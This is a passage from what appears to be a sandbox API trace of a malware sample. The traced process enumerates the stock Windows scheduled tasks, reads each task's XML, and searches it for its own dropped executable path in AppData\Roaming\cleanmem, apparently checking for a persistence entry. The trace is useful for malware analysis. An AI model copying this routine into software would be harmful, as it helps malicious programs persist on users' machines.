ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0227.567] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0227.568] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0227.568] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0227.568] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="Proxy") returned 0x0 [0227.568] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT31536000S\r\n false\r\n false\r\n \r\n false\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n") returned 0x0 [0227.570] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT31536000S\r\n false\r\n false\r\n \r\n false\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.594] IUnknown:Release (This=0x297020) returned 0x0 [0227.594] IUnknown:Release (This=0x296ed0) returned 0x0 [0227.594] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0227.595] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0227.595] IUnknown:Release (This=0x296ed0) returned 0x0 [0227.595] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0227.595] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0227.596] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0227.597] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0227.597] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0227.597] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="UninstallDeviceTask") returned 0x0 [0227.597] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n true\r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n") returned 0x0 [0227.599] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n true\r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.616] IUnknown:Release (This=0x297030) returned 0x0 [0227.616] IUnknown:Release (This=0x296ee0) returned 0x0 [0227.616] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0227.618] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0227.618] IUnknown:Release (This=0x296ee0) returned 0x0 [0227.618] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0227.618] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0227.618] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296f00) returned 0x0 [0227.622] IRegisteredTaskCollection:get_Count (in: This=0x296f00, pCount=0x12dff0 | out: pCount=0x12dff0*=3) returned 0x0 [0227.622] IRegisteredTaskCollection:get_Item (in: This=0x296f00, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297070) returned 0x0 [0227.622] IRegisteredTask:get_Name (in: This=0x297070, pName=0x12dea0 | out: pName=0x12dea0*="SystemTask") returned 0x0 [0227.622] IRegisteredTask:get_Xml (in: This=0x297070, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query Id=\"0\" Path=\"System\">\r\n <Select Path=\"System\">\r\n *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n </Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n") returned 0x0 [0227.624] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query Id=\"0\" Path=\"System\">\r\n <Select Path=\"System\">\r\n *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n </Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.667] IUnknown:Release (This=0x297070) returned 0x0 [0227.667] IRegisteredTaskCollection:get_Item (in: This=0x296f00, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297070) returned 0x0 [0227.667] IRegisteredTask:get_Name (in: This=0x297070, pName=0x12dea0 | out: pName=0x12dea0*="UserTask") returned 0x0 [0227.667] IRegisteredTask:get_Xml (in: This=0x297070, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]</Select></Query></QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n") returned 0x0 [0227.670] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]</Select></Query></QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.700] IUnknown:Release (This=0x297070) returned 0x0 [0227.700] IRegisteredTaskCollection:get_Item (in: This=0x296f00, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297070) returned 0x0 [0227.700] IRegisteredTask:get_Name (in: This=0x297070, pName=0x12dea0 | out: pName=0x12dea0*="UserTask-Roam") returned 0x0 [0227.700] IRegisteredTask:get_Xml (in: This=0x297070, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n PT0S\r\n true\r\n false\r\n \r\n") returned 0x0 [0227.702] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n PT0S\r\n true\r\n false\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.730] IUnknown:Release (This=0x297070) returned 0x0 [0227.730] IUnknown:Release (This=0x296f00) returned 0x0 [0227.730] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296f00) returned 0x0 [0227.731] ITaskFolderCollection:get_Count (in: This=0x296f00, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0227.731] IUnknown:Release (This=0x296f00) returned 0x0 [0227.731] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0227.731] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0227.731] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296f10) returned 0x0 [0227.733] IRegisteredTaskCollection:get_Count (in: This=0x296f10, pCount=0x12dff0 | out: pCount=0x12dff0*=3) returned 0x0 [0227.734] IRegisteredTaskCollection:get_Item (in: This=0x296f10, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x2970a0) returned 0x0 [0227.734] IRegisteredTask:get_Name (in: This=0x2970a0, pName=0x12dea0 | out: pName=0x12dea0*="Consolidator") returned 0x0 [0227.734] IRegisteredTask:get_Xml (in: This=0x2970a0, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n Microsoft Corporation\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n 1.0\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT19H\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n") returned 0x0 [0227.735] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n Microsoft Corporation\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n 1.0\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT19H\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.760] IUnknown:Release (This=0x2970a0) returned 0x0 [0227.760] IRegisteredTaskCollection:get_Item (in: This=0x296f10, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x2970a0) returned 0x0 [0227.760] IRegisteredTask:get_Name (in: This=0x2970a0, pName=0x12dea0 | out: pName=0x12dea0*="KernelCeipTask") returned 0x0 [0227.760] IRegisteredTask:get_Xml (in: This=0x2970a0, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)\r\n \r\n \r\n \r\n 2008-09-01T03:30:00\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n PT3M\r\n PT17H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n \r\n {e7ed314f-2816-4c26-aeb5-54a34d02404c}\r\n \r\n \r\n") returned 0x0 [0227.762] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)\r\n \r\n \r\n \r\n 2008-09-01T03:30:00\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n PT3M\r\n PT17H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n \r\n {e7ed314f-2816-4c26-aeb5-54a34d02404c}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.792] IUnknown:Release (This=0x2970a0) returned 0x0 [0227.792] IRegisteredTaskCollection:get_Item (in: This=0x296f10, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x2970a0) returned 0x0 [0227.793] IRegisteredTask:get_Name (in: This=0x2970a0, pName=0x12dea0 | out: pName=0x12dea0*="UsbCeip") returned 0x0 [0227.793] IRegisteredTask:get_Xml (in: This=0x2970a0, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)\r\n 1.0\r\n \r\n \r\n \r\n 2008-04-25T01:30:00\r\n true\r\n \r\n 3\r\n \r\n \r\n \r\n \r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {c27f6b1d-fe0b-45e4-9257-38799fa69bc8}\r\n \r\n \r\n \r\n") returned 0x0 [0227.795] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)\r\n 1.0\r\n \r\n \r\n \r\n 2008-04-25T01:30:00\r\n true\r\n \r\n 3\r\n \r\n \r\n \r\n \r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {c27f6b1d-fe0b-45e4-9257-38799fa69bc8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.824] IUnknown:Release (This=0x2970a0) returned 0x0 [0227.824] IUnknown:Release (This=0x296f10) returned 0x0 [0227.824] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296f10) returned 0x0 [0227.825] ITaskFolderCollection:get_Count (in: This=0x296f10, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0227.825] IUnknown:Release (This=0x296f10) returned 0x0 [0227.825] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0227.825] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0227.825] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0227.827] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0227.827] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0227.827] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="ScheduledDefrag") returned 0x0 [0227.827] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n 2017-09-27T01:00:00\r\n false\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n P7D\r\n true\r\n true\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c\r\n \r\n \r\n") returned 0x0 [0227.829] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n 2017-09-27T01:00:00\r\n false\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n P7D\r\n true\r\n true\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.862] IUnknown:Release (This=0x297020) returned 0x0 [0227.862] IUnknown:Release (This=0x296ed0) returned 0x0 [0227.862] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0227.863] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0227.863] IUnknown:Release (This=0x296ed0) returned 0x0 [0227.863] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0227.864] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0227.864] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0227.865] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0227.865] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0227.865] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="Scheduled") returned 0x0 [0227.865] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n 1.0\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT8H\r\n false\r\n false\r\n \r\n StopExisting\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {c1f85ef8-bcc2-4606-bb39-70c523715eb3}\r\n \r\n \r\n") returned 0x0 [0227.867] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n 1.0\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT8H\r\n 